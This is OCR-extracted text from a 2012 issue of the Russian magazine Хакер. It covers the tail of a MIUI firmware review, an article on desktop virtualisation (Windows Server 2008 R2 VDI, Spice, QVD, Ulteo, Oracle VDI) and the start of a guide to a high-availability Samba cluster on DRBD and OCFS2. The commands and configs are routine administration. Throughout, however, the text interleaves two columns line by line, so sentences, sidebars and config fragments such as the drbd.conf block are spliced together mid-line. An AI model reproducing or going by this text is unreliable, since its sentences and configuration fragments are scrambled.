дегтя. Многие пользователи упрекают азиатские языки, так что придется восполь- 6. Дважды нажми на часы на экране блоки-
разработчиков MIUI в слишком большой зоваться одной из неофициальных сборок, ровки, чтобы получить доступ к медиа-
похожести прошивки на iOS, операционную переведенных на другой язык. проигрывателю.
систему iPhone, и с ними трудно не согла- Те, кто предпочитает использовать англо- 7. Система умеет отображать заряд батареи
ситься. MIUI просто пропитана духом iOS, язычные версии ОС, могут скачать прошивку в процентах (SettingsÆSystem Æ Battery Æ
он здесь везде: в меню, иконках, каждая из с сайта miuiandroid.com (смотрим раздел Notification Indicator Style Æ Percentage).
которых обрамляется в квадрат со ско- ROMs). Всем остальным — добро пожаловать 8. Нажав кнопку «Домой» на экране блоки-
шенными углами, цветовой схеме и многих на русскоязычный ресурс miui.su, автор ровки, ты включишь фонарик.
других элементах. Даже стандартный до- которого самостоятельно переводит каждую 9. На экране блокировки тапни два раза по
машний экран выполнен в стиле iOS: меню новую прошивку на великий и могучий. значку СМС, чтобы прочитать последнее
приложений в нем нет, все установленные Также нужно быть очень внимательным сообщение.
программы сразу попадают на рабочий в выборе версии. Здесь все крайне запутано: 10. Для перемещения иконки на другой
стол, при заполнении которого создается например, текущая стабильная версия имеет рабочий стол выбери и удерживай иконку
новый, а затем — еще один, и так далее. Так номер 2.3.7, в то время как разрабатываемая одним пальцем, а другим — проматывай
что, установив сотню программ, ты будешь бета-версия — 2.1.20, а порт на основе ICS рабочие столы.
тратить время в основном на то, чтобы про- (Android 4.0) — 2.1.13. В общем, смотри в оба.
кручивать рабочие столы в поисках нужной ВЫВОДЫ
софтины (справедливости ради стоит ска- ИСПОЛЬЗОВАНИЕ Для многих пользователей CyanogenMod
зать, что установить альтернативный лончер Ничего сложного в общении с MIUI даже для и MIUI могут стать гораздо лучшим выбором,
система все-таки позволяет). ржавого чайника нет. Главное — запомнить, нежели стоковые прошивки смартфонов
Второй недостаток MIUI состоит в ори- что здесь отсутствует меню, и все приложения с собственными наработками компаний.
ентированности на рядового пользователя. будут установлены прямо на рабочий стол. Тем И они превращаются просто в спасение, когда
Здесь нет ни продвинутых настроек, ни ssh не менее, есть несколько моментов, знание производитель намеренно отказывается от
в комплекте, ни, тем более, поддержки уста- которых сильно упрощает жизнь. Итак, хит- обновления своего аппарата до новых версий
новки приложений на ext2-раздел. Красиво, парад скрытых возможностей MIUI. операционной системы. В мире открытых
ярко, удобно, но слишком скучно для тех, кто 1. Для отключения звука звонка просто по- исходных кодов всегда найдется разработ-
любит поковырять ОС и общается с зеленым ложи смартфон экраном вниз. чик, готовый выполнить порт или добавить
роботом на ты. 2. Долгое нажатие на кнопку поиска откроет функцию, которой так не хватало. z

ХАКЕР 04 /159/ 2012 115

SYN/ACK
SYN/ACK Сергей Яремчук ([email protected]), Евгений Зобнин ([email protected])

НОВАЯ ЭРА
терминальных систем
С ростом размера сети типичная среда, включающая ОС,
РАЗВОРАЧИВАЕМ приложения и данные, разбросанные на множестве компов,
ИНФРАСТРУКТУРУ становится громоздкой для управления, а пользователи
оказываются привязаны к своему рабочему месту.
VDI НА WIN2K8R2 Было предложено несколько технологий, призванных
решить данную проблему – терминальные серверы
И LINUX с централизованным хранением данных, переносимые
профили, виртуализация ОС. Но в итоге пришли к логическому
финалу — виртуализации рабочего стола.

116 ХАКЕР 04 /159/ 2012

 Новая эра терминальных систем

Роль узла виртуализации рабочих столов требует наличия Hyper-V Настройка личного виртуального рабочего стола в «Свойствах» пользователя AD

НАСТРОЙКА VDI В WIN2K8R2 зователь закончил работу, виртуальная машина останавливается

Наиболее интересные возможности служба Terminal Services по- и больше не расходует ресурсы сервера, хотя при следующем об-
лучила с выходом Win2k8R2, причем чтобы подчеркнуть значимые ращении требуется некоторое время на ее запуск.
изменения в функциях, она была переименована в Remote Desktop Информация о персональном рабочем столе, назначенном пользова-
Services (RDS). В частности, благодаря реализации технологии VDI телю, хранится в AD (при функциональном уровне домена Win2k8R2),
(Virtual Desktop Infrastructure) Win2k8R2 теперь может являться посмотреть и скорректировать ее можно в свойствах учетной записи
частью инфраструктуры DaaS (Desktop as a Service). Новая роль («Active Directory -> Пользователи и компьютеры»), во вкладке «Лич-
RD Virtualization Host представляет собой сервер с ролью Hyper-V ный виртуальный рабочий стол» (Personal Virtual Desktop).
с подготовленными VM, доступ к которым реализуется традици- В VDI соединении участвуют все компоненты RDS:
онными средствами RDS по протоколу RDP. Пользователь вместо • RD Web Access — страница входа, предназначенная для подклю-
доступа к отдельному приложению получает полноценное (хотя чения, выдается список доступных виртуальных рабочих столов
и виртуальное) рабочее место, которое настраивает полностью по и приложений;
своему вкусу и в соответствии со своими задачами. Подключаться • RD Gateway – обеспечивает доступ пользователей, находящихся
к своему рабочему столу он может практически с любого устрой- вне корпоративной сети;
ства, интегрированного в сеть — тонкого клиента, ноутбука, ПК или • RD Connection Broker — управление подключениями к VM, ис-
смартфона. Системные требования к клиентскому ПК минимальные. пользуется для балансировки нагрузки, отслеживает и восста-
Внешне TS/RDS от VDI для пользователя мало чем отличается, навливает соединения;
но переход к последнему имеет ряд плюсов — каждый получает • Remote Desktop Session Host (RDSH) — основная роль, обеспечи-
персональный набор ОС и приложений, сбои и вирусы не окажут вающая подключение к удаленному рабочему столу и RemoteApp;
влияния на другие системы. Администратор четко устанавливает • RD Virtualization Host (RDVH) — обеспечивает функциональность
ресурсы, чтобы восстановить работоспособность, понадобится пара VDI, требует наличия роли Hyper-V (если таковой нет, она будет
минут, упрощено хранение данных, обновление и распределение автоматически предложена мастером установки);
лицензий ПО. Нужен новый рабочий стол – пожалуйста: одно дви- • RD Licensing — хранилище лицензий RDS CALs, в течение 120
жение мышкой, и пользователь уже может работать. дней возможна работа в тестовом режиме.
Виртуальные рабочие столы могут быть:
• Personal Virtual Desktops — персональными, когда каждый Сам процесс подключения к VDI прозрачен, пользователь выби-
пользователь получает индивидуальный образ ОС с полным до- рает назначенный ему VDI в RD Web Access или запускает подготов-
ступом, может настраивать рабочую среду по своему усмотрению, ленный RDP файл, все остальное будет выполнено автоматически
пользовательские данные хранятся в самом VD; на основе его прав в домене.
• Virtual Machine Pool — общий с унифицированными настройками Все настройки ролей производятся в соответствующих консолях:
и приложениями VDI, пользователь, запрашивая доступ к пулу, «Диспетчер Hyper-V», «Конфигурация узла сеансов RDP», «Диспет-
получает любой свободный десктоп, по окончании работы все
данные и настройки в образе не сохраняются.

Персональный и общий VD создаются из заранее подготов-

ленных администратором наборов образов и отличаются лишь на- С VDI ПОЛЬЗОВАТЕЛЬ ПОЛУЧАЕТ
значением и возможностью сохранения изменений. Общий рабочий
стол удобен, когда требуется временный доступ (например, при ВИРТУАЛЬНОЕ РАБОЧЕЕ МЕСТО,
обучении, семинарах), или когда данные хранятся централизован-
но, а для их обработки используются специфические приложения, КОТОРОЕ НАСТРАИВАЕТ ПО
не требующие подстройки на клиентской стороне. Если сеанс не
заканчивается, а просто производится отключение от общего VD, СВОЕМУ ВКУСУ И В СООТВЕТСТВИИ
то все данные сохраняются, и пользователь может в любой момент
вернуться к работе. Еще один важный момент: как только поль- СО СВОИМИ ЗАДАЧАМИ
ХАКЕР 04 /159/ 2012 117
SYN/ACK
SYN/ACK

чер подключений к удаленным рабочим столам» и других. В частно-

сти, в «Диспетчере подключений…» после стандартной настройки
ролей Hyper-V и RDS следует подключить сервер узла виртуализа-
ции (Add RD Virtualization Host Server) и запустить «Мастер настрой-
ки виртуальных рабочих столов» (Сonfigure Virtual Desktops Wizard),
который поможет добавить в список все узлы с Hyper-V, сервер RD
Connection Broker и RD Web Access. Теперь осталось лишь назначить
пользователям виртуальный десктоп. Это можно проделать в свой-
ствах учетной записи AD или запустив мастер назначения вирту-
ального рабочего стола (Assign Personal Virtual Desktop). Пул VD
также создается в RD Connection Broker при помощи мастера Virtual
Machine Pool Creation Wizard, который запросит два параметра —
имя пула и имя RD Connection Broker. В настройках всех сервисов
помогает анализатор соответствия рекомендациям (BPA).
Веб-интерфейс QVD Web Administration Tool

SPICE
Когда UNIX перешел из эпохи текстовой консоли в эпоху графических деокарты, что позволяет ему применять множество различных техник
интерфейсов, вопрос о связи терминалов и серверов, казалось, был оптимизации передачи тяжелых данных, включая сжатие изображе-
решен. Графическая подсистема UNIX была разработана с целью обе- ний, видеопотоков, интеллектуальное распределение нагрузки между
спечения сетевого доступа к удаленному дисплею и позволяла сде- клиентом и сервером, синхронизация видео- и аудиоданных. Являясь
лать это легко и без лишних хлопот. Админ просто авторизировал воз- протоколом доступа к виртуальным машинам, Spice позволяет вы-
можных пользователей и запускал на терминалах X-сервер, который делять для различных групп пользователей виртуальные машины,
принимал запросы на отрисовку графики от приложений, работающих работающие под управлением различных ОС. В целях безопасности
на мэйнфрейме. Простая и понятная схема, превосходно работаю- каждому пользователю можно выделить собственную виртуальную
щая в 80-х. Сегодня доступ к удаленному рабочему столу с помощью машину. В общем и целом инфраструктура сети тонких клиентов, по-
X-протокола просто бессмысленен. Современные приложения уже не строенная с использованием Spice, будет выглядеть как набор простых
используют простые и легковесные команды для отрисовки своего ин- ПК, снабженных простым Spice-клиентом, и мэйнфрейма/кластера, на
терфейса, а работают с графическими буферами, постоянно посылая котором крутятся виртуальные машины с поддержкой Spice-сервера
X-серверу команды по их отрисовке и обновлению. Это очень мощный (по одной на каждого клиента или же на группу пользователей).
и тяжелый поток данных, с которым едва справляются современные Компания Red Hat, купившая разработчиков Spice в 2009 году, хорошо
каналы связи. Видео при таком способе обмена данными, например, постаралась, чтобы интегрировать поддержку протокола во все воз-
смотреть уже невозможно. Одним из способов решения этой проблемы можные средства управления виртуальными машинами. Сегодня Spice
является переход на более современные, интеллектуальные про- встроен в QEMU, библиотеку libvirt и инструменты управления вирту-
токолы доступа к удаленному рабочему столу. Spice — один из лучших альными машинами типа virt-manager и virsh. Псевдодрайвер Spice,
примеров такого протокола. По сути Spice является механизмом досту- позволяющий выжать из протокола все, уже доступен для X-сервера,
па к удаленным виртуальным машинам, позволяющий пробрасывать а в качестве клиентов доступны простой spicec, работающий поверх X
по сети не только изображение рабочего стола, но и многое другое, Window, специальный плагин для Firefox, а также несколько графиче-
включая устройства ввода, USB-порты и аудиопоток. Передача этих ских клиентов на основе библиотек GTK и Qt.
данных осуществляется настолько эффективно, что даже на не самом Фактически, все что нужно сделать для запуска простейшей
высокоскоростном соединении пользователь может свободно поль- Spice-сети — это выполнить две простые команды:
зоваться всеми услугами современных графических сред, смотреть
видео, прослушивать музыку и, в общем-то, делать все, что угодно (не 1. На стороне сервера:
удастся, пожалуй, разве что играть в современные игры). Сервер Spice
встроен в виртуальную машину и работает на уровне виртуальной ви- $ sudo apt-get install qemu-kvm

Мастер настройки виртуальных рабочих столов Подключение к удаленному рабочему столу QVD

118 ХАКЕР 04 /159/ 2012

 Новая эра терминальных систем

Веб-клиент Ulteo

$ qemu-kvm -spice port=1234,disable-ticketing \ Демон должен запуститься автоматически, в противном случае

-hda /путь/до/образа/диска стартуем его самостоятельно:

2. На стороне клиента: $ sudo /etc/init.d/libvirtd start

$ sudo apt-get install spice-client Теперь идем на машину с иксами, ставим virt-manager и подключа-
$ spicec -h localhost -p 1234 емся к libvirtd:

Для тестирования этого вполне достаточно, но для развертыва- $ sudo apt-get install virt-manager
ния сети с десятком-другим клиентов, работающих с разными $ virt-manager -c qemu+ssh://[email protected]/system
ОС, гораздо удобнее воспользоваться графическим менеджером
виртуальных машин virt-manager. Я не призываю устанавливать на Нажав на кнопку «Новая», создаем новую виртуальную ма-
сервер иксы, потому как virt-manager может работать и удаленно, шину с нужными опциями, производим установку ОС, тестируем.
посылая команды демону libvirtd по ssh. Итак, ставим на сервер Если имеем дело с UNIX, обязательно устанавливаем видеодрай-
qemu, libvirt и демон libvirtd: вер для Spice-сервера xorg-video-qxl, без него большая часть
оптимизаций не будет работать. Далее выключаем виртуальную
$ sudo apt-get install bridge-utils dnsmasq \ машину, выбираем пункт меню «Вид -> Подробности», нажимаем
kvm qemu libvirt libvirt-bin «Добавить оборудование», выбираем пункт «Graphics», в поле
«Тип» указываем «Spice server», указываем нужный номер порта

ТЕХНОЛОГИИ MED-V И APP-V

Нередко в организациях можно встретить приложения, работающие Внешне такое приложение работает как обычное (его видно в менеджере
только под WinXP — перенос их под новые Win7 или Vista невозможен или задач), но выполняется в особой виртуальной среде. По сути, App-V — это
нецелесообразен. Даунгрейд ОС также неприемлем, самая банальная удобное средство доставки приложений, работающих в родной среде
причина — нет драйверов под новый ноутбук. Держать отдельный (в отличие от MED-V), не требующее выделения под них отдельного ПК или
комп лишь для одной древней проги тоже не выход. Технология MED- подключения к терминальному сервису. Назначением приложений можно
V (Microsoft Enterprise Desktop Virtualization, clck.ru/WQqT) является управлять при помощи групповых политик, так же просто и убрать доступ,
неким аналогом реализации VDI, но на клиентской стороне. Одной из не удаляя его физически.
основных ее частей является всем известный XP Mode, позволяющий Данные технологии не доступны для Win7 Home/Starter
запускать виртуальную ОС (WinXP/Vista) в специальной редакции Virtual и не входят в стандартную поставку. Чтобы воспользоваться
PC. При этом пользователь даже не заметит «подмены», — вместо окна возможностями MED-V, необходимо установить MDOP (Desktop Op-
виртуальной машины он будет работать с «обычным» приложением, timization Pack, пакет содержит еще ряд полезных решений). Если
запускаемым через меню «Пуск». систем, требующих MED-V, очень много, понадобится развертывание
Технология App-V (Microsoft Application Virtualization) дает возможность специального сервера управления, хотя MED-V 2.0 и App-V
преобразовать обычные приложения в виртуальные, причем интегрируются с System Center Configuration Manager.
пользователю не нужно их перед этим устанавливать и настраивать.

ХАКЕР 04 /159/ 2012 119

SYN/ACK
SYN/ACK

мыши на виртуальной машине -> Clone») и немного изменить на-

стройки каждой из них. Само собой разумеется, что при количестве
SPICE ПОЗВОЛЯЕТ ПРОБРАСЫВАТЬ клиентов, превышающем 10-15, одним сервером не обойтись,
поэтому в virt-manager есть возможность управления виртуаль-
ПО СЕТИ НЕ ТОЛЬКО ИЗОБРА- ными машинами на нескольких серверах («Файл Æ Добавить
соединение»).
ЖЕНИЕ РАБОЧЕГО СТОЛА, НО И
QVD
УСТРОЙСТВА ВВОДА, USB-ПОРТЫ, Проект QVD (Quality Virtual Desktop, theqvd.com) представляет
собой масштабируемое, эффективное и простое в управлении VDI
АУДИОПОТОК с открытым исходным кодом, построенное на базе GNU/Linux и по-
зволяющее запускать VM с одного или нескольких образов ОС на
одном узле. Основным направлением развития проекта является
и пароль. Если был установлен драйвер qxl, переходим в раздел обеспечение доступа к VDI как можно большего числа пользовате-
«Видео» и в поле «Модель» выбираем qxl. Все, виртуальная маши- лей и минимизация потребления ресурсов для каждой сессии. Ша-
на готова к удаленному подключению по протоколу Spice. Теперь блонный образ ОС может быть использован несколькими VDI, что
нужно настроить тонкие клиенты так, чтобы они автоматически позволяет стандартизировать рабочую среду и упростить управ-
цеплялись к Spice-серверу после загрузки. Для этого устанавли- ление. Состояние VD записывается в отдельный образ (overlays),
ваем на клиенты любой Linux дистрибутив, содержащий X-сервер который по окончании работы может уничтожаться (по умолчанию)
из коробки. После установки создаем беспарольного пользователя или сохраняться. Во втором варианте при следующем подключе-
с любым именем и прописываем ему в автозагрузку следующую нии клиент сразу продолжит работу с того же места. В настоящее
команду: время проект предлагает клиенты для Windows и Linux, на подходе
версия для Android.
spicec -f -h адрес_сервера -p номер_порта -w пароль В настоящее время QVD считается надежной и безопасной сре-
дой и используется во многих организациях, в том числе благодаря
Ее можно поместить либо в файл ~/.xsession пользователя, быстрой окупаемости вложений (Return on Investment, ROI). Напри-
сразу после слова «exec», либо в скрипт внутри каталога ~/.config/ мер, его выбрал крупнейший банк Мексики BBVA Bancomer.
autostart, чтобы его подхватывала среда рабочего стола. В любом Основой QVD является технология KVM (Kernel Virtual Machine),
случае после логина пользователя будет стартовать Spice-клиент клиент для доступа использует протокол NX, обеспечивающий
на полный экран и устанавливать соединение с виртуальной защищенное и стабильное соединение при низкоскоростных под-
машиной. Чтобы пользователю не приходилось два раза входить ключениях. Авторизация пользователя возможна средствами LDAP.
(сначала в реальную машину, затем — в виртуальную), лучше на- Функционально система состоит из трех компонентов: одного
строить автологин. или нескольких QVD-серверов, сервера управления и сервера
Для каждого терминала можно создать собственную виртуаль- PostgreSQL. Чтобы обеспечить максимальную производитель-
ную машину, указывая разные порты и пароли Spice в настройках. ность и масштабируемость, они должны располагаться на разных
Сделать это с помощью virt-manager очень просто. Достаточно машинах. Разработчиками сообщается, что QVD был развернут на
создать нужное число клонов виртуальной машины («правый клик предприятии для обслуживания более 35 000 пользователей и обра-

QEMU VM
Guest

vdagent qxl driver standard guest drivers

vmc
Keyboard AC97
QXL (cirrus) (nic)
virtio-serial Mouse Tablet ES1370

spice server

display record
main inputs (tunnel)
cursor playback

spice client

user’s machine (printer)

Механизм доступа Spice

120 ХАКЕР 04 /159/ 2012

 Новая эра терминальных систем

INFO
•О настройке
ULTEO OPEN VIRTUAL DESKTOP (OVD) сервера терминалов
в Win2k8 читай в ][
09.08;
•подробнее о Hyper-
Платформа OVD (ulteo.com) от Гаэля Дюваля, создателя данными идет по RDP (TCP/3389). В текущей редакции V читай в статье
«Гиперактивная
Mandrake/Mandriva Linux, позволяет организовать доступ пользователь может без проблем воспроизводить аудио- виртуальность», ][
при помощи веб-браузера или специального клиента и видеофайлы из домашних каталогов, размещенных на 02.09;
к рабочим столам или отдельным приложениям на базе удаленных системах. Поддерживается более двадцати •в ][ 11.10 ты
найдешь обзор
Linux или Windows. При этом пользователь подключается языков, в том числе и русский. Серверная часть платформы VMware View 4.5;
к своему рабочему месту с любого ПК, на котором установлен поддерживает установку (через специальный репозиторий) •в Win2k8R2 RDS
умеет назначать
браузер с Java плагином. Решение совместимо с некоторыми на Ubuntu 10.04 LTS, RHEL 5.5 (неофициально CentOS и Fe- динамический/
облачными системами вроде Amazon EC2. Структурно OVD dora), Novell SLES 11 SP1, Win2k3/2k8/R2 (только сервер виртуальный
состоит из нескольких компонентов: менеджера сессий, приложений). Доступен и установочный DVD, построенный на IP-адрес каждому
сеансу или
сервера приложений, файлового сервера и шлюза. Первые базе Ubuntu. приложению, что
два являются основными. Аутентификация пользователя Сегодня Ulteo активно развивается и зарекомендовал решает проблему
привязки к IP;
возможна средствами LDAP/AD и CAS. себя стабильным продуктом, используется в госсекторе •технологии TS/RDS
В настоящее время доступен RC8 новой ветки 3.0. Для и образовании, небольших и средних предприятиях, а также и VDI не
организации подключения к удаленным рабочим столам некоторыми хостинговыми компаниями, предоставляющими взаимоисключают,
а дополняют друг
используется защищенный протокол HTTPS/443, обмен услуги удаленного доступа. друга;
• в настоящее время
QVD используется
в крупнейшем банке
Мексики BBVA
Bancomer.
ORACLE VDI
WWW
•Набор руководств
Технология, являющаяся частью Oracle Virtualization — набора защиты (на локальной машине не сохраняется никакая от Microsoft по
средств виртуализации, который призван покрывать все лишняя информация — cookie, кэш, авторизация и так далее). развертыванию RDS
и VDI: clck.ru/WddP;
потребности организаций от терминалов (вроде Sun Ray) до ЦОД К слову, менеджер администрирования VDI также написан •сайт QVD:
(Sun Fire, Sun Storage). Oracle VDI представляет собой менеджер на Java и представляет собой веб-приложение. Режим «kiosk theqvd.com.
сессий — connection broker — обеспечивающий подключение mode» позволяет работать с приложением в полноэкранном
клиентов к виртуальным рабочим местам по протоколам режиме без возможности доступа к самой ОС. Технология WARNING
RDP или SGD (Oracle Secure Global Desktop). В качестве Array Resilience в случае недоступности основного сервера Для возможности
виртуальных машин (Virtualization Layer) могут выступать автоматически переключает соединение на следующий удаленного
VirtualBox, VMware vSphere, Hyper-V, а также отдельные ПК, сервер в массиве. Пользователи могут иметь персональные подключения
к сессии клиентов
предоставляющие доступ по RDP. Приложения могут работать десктопы или работать с пулом, подключать сменные носители, необходимо в ветке
под управлением любой популярной ОС (Windows, Solaris, воспроизводить качественное видео и аудио, получить реестра HKEY_LOCAL_
MACHINE\SYSTEM\Cur-
Linux, *nix и др). В случае выбора SGD пользователь запускает 32-битный цвет и так далее. Индивидуальные параметры rentControlSet\Con-
в браузере специальный веб-клиент, обеспечивающий доступ подключений можно хранить в атрибутах AD/LDAP. В качестве trol\TerminalServer
к данным с любого устройства (браузер, поддерживающий базовой платформы используется Solaris или Oracle Enterprise установить значение
параметра AllowRe-
Java[RR1]), шифрование сеанса и дополнительный уровень Linux (клон RHEL). moteRPC в «1».

ботки до 9 000 одновременных сессий, причем успешно справлялся После обновления в списке появится несколько пакетов qvd-*. Для
с работой. Сервер управления обеспечивает подключение клиентов, упрощения изучения разработчики предлагают специальный мета-
запуск нужной VM и получение виртуального IP. Состоит из трех пакет, устанавливающий все компоненты на один сервер:
компонентов: брокера соединений L7R, демона HKD (House Keeping
Daemon), отвечающего за пуск/останов VM и связь с БД, и Node $ sudo apt-get install \
— элемента управления L7R и HKD. Для хранения данных исполь- qvd-demo-single-instance-nosupport qvd-admin
зуется любой NAS/SAN ресурс. Управление и мониторинг работы
производятся при помощи веб-интерфейса QVD Web Administration Теперь можно подключаться к WAT, который по умолчанию рабо-
Tool (WAT, написан на Perl Catalyst) или из консоли (qvd-admin). тает на 3000 порту, и приступать к настройкам. Чтобы упростить
Доступно несколько версий QVD – свободный Community, плат- установку, из поставки убраны все образы ОС, поэтому их при-
ный Commercial и сервис Cloud (на хостинге QVD). Сравнение их дется «готовить» самостоятельно (за плату разработчики пред-
функциональности можно найти на сайте. лагают несколько вариантов, в том числе и индивидуальные). Все
Проект предоставляет репозиторий пакетов для Ubuntu 10.04 образы хранятся в четырех подкаталогах /var/lib/qvd/storage (его
LTS и SLES, а также демообразы для виртуальных машин (на базе обычно монтируют через NFS): homes (qcow2 изображения поль-
Ubuntu 10.10). Но разработчики отмечают, что установить QVD при зовательского /home), images (ОС), overlays (временные файлы)
помощи исходных текстов можно на любом Linux. В Ubuntu 10.04 и staging.
LTS процесс выглядит довольно просто, вначале следует добавить
информацию о новом репозитории: ЗАКЛЮЧЕНИЕ
Как ты мог убедиться, идея терминалов и единого вычислительного
$ sudo apt-add-repository \ центра продолжает жить и процветать, заставляя программистов
'deb http://theqvd.com/debian lucid main' и админов выдумывать все более изощренные методы связи, удо-
$ sudo apt-get update влетворяющие потребностям сегодняшнего дня. z

ХАКЕР 04 /159/ 2012 121

SYN/ACK
SYN/ACK Евгений Зобнин ([email protected])

НЕИЗМЕННО ВЫСОКАЯ
ДОСТУПНОСТЬ
РАЗВОРАЧИВАЕМ Каждая организация в той или иной мере
нуждается в быстром и надежном сервисе
ОТКАЗОУСТОЙЧИВЫЙ хранения данных. В большинстве случаев эта
задача решается с помощью покупки разного
СЕРВИС ХРАНЕНИЯ рода оборудования, реализующего NAS, однако
ДАННЫХ НА БАЗЕ создать высокопроизводительный и устойчивый
к сбоям файловый сервис можно и на базе
SAMBA парочки стареньких серверов, оснащенных
достаточно емкими дисками.

122 ХАКЕР
0122 ХАКЕР 04
04 /159/
/159/ 2012
2012
 Неизменно
Неизменно высокая
высокая доступность
доступность

Странички, посвященные проекту CTDB

ВВЕДЕНИЕ Итого для настройки высоконадежного файлового сервиса

В этой статье мы рассмотрим процесс создания высоконадежно- Samba нам необходимо следующее.
го файлового хранилища, реализованного на безе двух типичных 1. Обзавестись двумя серверами, в каждом из которых установлено
серверов, операционной системы GNU/Linux и сервера Samba. два диска и две сетевые карты.
Мы создадим небольшой, но устойчивый к сбоям кластер: вы- 2. Настроить сетевой RAID1 между ними.
ход одного из узлов из строя никак не повлияет на доступность 3. Поднять параллельную ФС на RAID1-массиве.
данных. 4. Установить и настроить на каждом узле Samba.
5. Поднять CTDB для расшаривания данных о состоянии между
ТЕОРИЯ демонами Samba.
В обычной ситуации файловый сервис на основе Samba выглядит
как машина, оснащенная достаточно емким жестким диском, на Такой вот многослойный пирог, приготовлением которого мы и
которую установлен дистрибутив Linux и пакет программ Samba, займемся прямо сейчас.
отвечающих за обслуживание клиентских запросов на доступ к
ресурсам. Изъян такой конфигурации в том, что выход из строя НАСТРОЙКА ХРАНИЛИЩА
жесткого диска моментально обрушит весь сервис и оставит кли- Итак, у нас есть два сервера, каждый из которых оснащен двумя
ентов без хранилища данных. жесткими дисками. На /dev/sda стоит операционная система
Понятно, что для решения этой проблемы следует в обяза- (я буду использовать Debian), /dev/sdb отведен для хранения
тельном порядке применять RAID1-массив, который позволит данных Samba. Можно использовать и один диск, но такая
сохранить данные и работоспособность сервиса, даже если один из конфигурация будет менее производительной и удобной в сопро-
дисков умрет. Это типичная конфигурация, которая, тем не менее, вождении.
не спасет от смерти самого сервера или одной из его железяк. В Наша первоочередная задача — объединить жесткие диски
этом случае данные все равно окажутся недоступны. двух машин в массив RAID1. Сделать это по сети можно с помо-
Чтобы избежать и этой ситуации, можно собрать мини-кластер щью драйвера DRBD и кроссовер-кабеля, соединяющего серверы
из нескольких машин, данные с жестких дисков которых будут напрямую через одну из двух сетевых карт. Это позволит создать
зеркалироваться по сети c помощью драйвера DRBD и специаль- мост для быстрого обмена данными между машинами, в то время
ной параллельной файловой системы. Но и здесь есть загвоздка: как клиенты будут получать доступ к кластеру с помощью другого,
если мы просто установим на оба этих узла Samba, то легко по- внешнего сетевого интерфейса.
лучим несогласованность файловой системы, видимой удаленным Чтобы не путаться, сразу определимся, что 10.0.0.1 и 10.0.0.2
пользователям. — это внутренние IP-адреса, объединяющие серверы с помо-
Для отображения семантики файловой системы UNIX в CIFS щью кроссовер-кабеля, а 192.168.0.1 и 192.168.0.2 — это внешние
и поддержки своего состояния Samba использует легковесные адреса, по которым будет происходить обмен сервисными данными
базы данных, называемые TDB, которые содержат такие данные и которые будут видны клиентам (на самом деле все несколько
как таблица соответствия Windows SID и Unix UID/GID, данные сложнее, но об этом позже).
об открытых сессиях, таблицу блокировок и так далее. Если два После настройки IP-адресов выполняем на каждой машине
экземпляра Samba будут работать с одним общим хранилищем, но следующую команду:
иметь разные таблицы TDB, это приведет к весьма печальным по-
следствиям с первых же минут запуска сервиса. # apt-get install drbd8-utils
Но и этой проблемы можно избежать, воспользовавшись демо-
ном CTDB (Cluster TDB), который будет хранить единую базу данных Далее на одной из машин создаем файл /etc/drbd.conf и пишем
для нескольких экземпляров Samba и следить за ее соответствием в него следующее:
реальному положению дел. В качестве бонуса CTDB также будет
выполнять функции мониторинга и автоматического отключения # vi /etc/drbd.conf
нерабочих узлов от кластера, что избавит нас от необходимости ис- global { usage-count no; }
пользования сторонних инструментов. common { syncer { rate 100M; } }

ХАКЕР 123
ХАКЕР 04
04 /159/
/159/ 2012
2012 0123
SYN/ACK
SYN/ACK Евгений Зобнин ([email protected])

Как работает DRBD

resource r0 { device /dev/drbd0;

protocol C; disk /dev/sdb;
startup { address 10.0.0.2:7788;
wfc-timeout 15; meta-disk internal;
degr-wfc-timeout 60; }
} }
net {
# Настройки двухголовой конфигурации (primary/primary) Главное здесь — это пароль, используемый для доступа к
allow-two-primaries; массиву, а также два последних блока, описывающих диски
after-sb-0pri discard-zero-changes; массива. Они могут иметь произвольные имена, однако поля
after-sb-1pri consensus; должны содержать актуальные данные для каждого из хостов.
after-sb-2pri disconnect; Опция «disk» задает блочное устройство, которое станет частью
# Пароль и метод шифрования массива, опция «address» — внутренний IP-адрес узла и порт
shared-secret "ПАРОЛЬ"; DRDB. Файл необходимо скопировать на второй узел в неизмен-
cram-hmac-alg sha1; ном виде.
} Теперь инициализируем массив, выполнив на обоих узлах
# Первый узел команду:
on node1 {
device /dev/drbd0; # drbdadm create-md r0
disk /dev/sdb;
address 10.0.0.1:7788; Далее стартуем сервис drbd (опять же на обоих узлах):
meta-disk internal;
} # /etc/init.d/drbd start
# Второй узел
on node2 { На одном из узлов выполняем следующую команду, которая
сделает оба узла главными, то есть позволит монтировать DRBD-
девайс с обеих нод:

# drbdsetup /dev/drbd0 primary -o

СОБИРАЕМ МИНИ-КЛАСТЕР ИЗ
После этого должна начаться синхронизация, за ходом которой
НЕСКОЛЬКИХ МАШИН, ДАННЫЕ С можно следить, читая файл /proc/drbd:

ЖЕСТКИХ ДИСКОВ КОТОРЫХ БУДУТ # cat /proc/drbd

ЗЕРКАЛИРОВАТЬСЯ ПО СЕТИ После окончания синхронизации на массиве можно создать

124 ХАКЕР
0124 ХАКЕР 04
04 /159/
/159/ 2012
2012
 Неизменно
Неизменно высокая
высокая доступность
доступность

файловую систему. Стандартная ФС не подойдет, так как не сможет Далее ФС можно смонтировать (здесь и далее я буду использо-
обеспечить соответствие метаданных при одновременном доступе вать каталог /samba в качестве точки монтирования и корня для
к ФС с разных узлов. Поэтому нам нужна параллельная файловая Samba):
система (также называемая кластерной), на роль которой отлично
подойдет OCFS2 от Oracle (хотя можно использовать и любую дру- # mkdir /samba
гую, например GFS2). # echo "/dev/drbd0 /samba ocfs2 noatime 0 0" >> /etc/fstab
Код OCFS2 есть в ядре, поэтому все, что требуется установить, # mount /dev/drbd0
это утилиты управления:
Сделать это необходимо на обоих узлах. Чтобы избежать воз-
# apt-get install ocfs2-tools можных проблем в будущем, проверь работоспособность кластера
и корректность настроек с помощью копирования файлов и ката-
Конфиг файловой системы хранится в /etc/ocfs2/cluster.conf. логов в файловую систему. При правильной настройке содержимое
В нашей конфигурации он должен иметь примерно следующий ФС должно выглядеть идентично на обоих узлах.
вид:
ЗАПУСК SAMBA
# vi /etc/ocfs2/cluster.conf Если в работе файловой системы не возникает проблем, то можно
cluster: переходить к установке и настройке Samba. Главное здесь, как я
node_count = 2 уже говорил, демон CTDB, поэтому мы остановимся на очень про-
name = ocfs2 стом конфиге Samba, а ее кластерную составляющую рассмотрим
более подробно.
node: Итак, наш конфиг Samba будет выглядеть примерно так:
ip_port = 7777
ip_address = 192.168.0.1 [global]
number = 1 clustering = yes
name = node1.cluster.local idmap backend = tdb2
cluster = ocfs2 private dir=/samba/ctdb
fileid:mapping = fsid
node: vfs objects = fileid
